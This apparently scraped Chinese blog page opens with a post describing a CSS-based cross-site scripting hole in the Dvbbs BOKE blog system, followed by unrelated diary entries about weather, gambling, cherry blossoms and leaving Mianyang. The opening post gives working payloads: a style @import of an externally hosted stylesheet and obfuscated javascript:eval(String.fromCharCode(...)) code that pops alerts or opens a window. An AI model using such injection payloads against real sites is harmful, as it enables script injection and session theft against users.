Xio's

前一段时间，找到了动网 BOKE的跨站漏洞，这个漏洞可以用CSS来跨站，也就是样式表，具体的跨站方法是：

基本利用方法

选择"代码"方式，在其中输入以下代码：

<style type='text/css'>@import url(http://www.pc010.cn/1.css);</style>

其中的@import 是CSS的自定义属性，url是要链接的CSS样式，而 http://www.pc010.cn/1.css 的内容如下：

<style type="text/css">
<!--
@import url(javascript:eval(String.fromCharCode(97,108,101,114,116,40,39,84,101,115,116,32,49,39,41,59,97,108,101,114,116,40,39,84,101,115,116,32,50,39,41,59)));
-->
</style>

这是一段弹出alert窗口的代码，其中的String.fromCharCode是用来将字符转为ASCII值的函数。

打开新窗口的代码

OPEN 的代码如下：

@import url(javascript:eval(String.fromCharCode(111,112,101,110,40,39,104,116,116,112,58,47,47,119,119,119,46,110,111,104,97,99,107,46,99,110,39,44,39,-17702,-16435,-13610,-19743,39,44,39,119,105,100,116,104,61,50,48,48,44,104,101,105,103,104,116,61,50,48,48,39,41,59)));

昨天老爸说今天会有10级大风，我怎么也想不到这个偏僻的山区会有这么大的风。开玩笑对隔房表姐说，你还是把你的信用卡拿上躲到红薯窖里面去吧，呵呵。

结果风确实起了，但没有预报的那么大。

最近手气不错，昨天又赢钱了。不过这样下去，朋友们都要说我成赌徒了。

有点郁闷，TOM那边出了点状况，下起了暴雪！等会上QQ问问情况再说。

先这样了。

---

写于2007年3月4日，记录当时的生活片段。

樱花又开了，春天真的来了。

每年这个时候，看到满树的樱花，总是让人心情愉悦。粉色的花瓣在微风中轻舞，仿佛在告诉我们，新的一年又开始了。

---

拍摄于2007年3月1日

天气：多云

秋天还没到来，我却又要飘了，然而，此时此刻却再没有黄叶做伴....

绵阳是一个不大不小的城市，拥有形形色色其他城市不能攀比的韵味。可是我却并不留恋在一个固定的地方，比如这个城市。当然，除了我在绝望时会怀念归宿，我就绝不会有其他例外了。我不知道什么东西才能抵制住我飘的欲望，也许，根本就不会有什么东西来抑制我的思想，又或许我本来就注定是漂浮不定的...

明天，我就要踏上回家的列车回到我久违的故乡，我知道那里现在一定是绿树成荫，花开正好，温度适宜清爽的美好季节。我明白，在那样的空间里面会让我忘记很多不想纪念的事情，我期待父亲叫我吃饭的声音，依然怀念我和老爸抢电脑玩的那激动场面，甚至是一起玩玩麻将也行，这都是令我神往的事情，当然这只是在一种特定场面下的幸福感觉！

对于绵阳，我不知道我到底收获了什么，或者是收益了什么，更或者是说我为什么能够在绵阳待这么久，我都不是很清楚。唯一肯定的是工作是次要的约束因素，更主要在于某种精神或者是某种执着。当然，我的再次漂泊不能毫无凭据地就说我已经没了那种精神或者是执着，我想环境会改变一个人的思想，并且完善它！

这一次漂流大行动中，我为了给自己一个很好的理由，我说了，下一个城市一定更美，那里会拥有AS ROMA的火爆，也拥有酒吧的另类，并且又有着能美容的空气...有什么理由不离开这里去创造，去发掘，去适应一个新的城市呢？

...我说了，我的离开对我来说不惨淡，而是对这里的一些朋友们来讲，我是不应该离开的！

八月的时候，我又在期待明年的沿海，明年的华侨，明年的那所大学，我相信，命运总是公平的。

---

写于2006年7月23日 17:14 QQ空间

那些年轻时关于漂泊与归宿的思考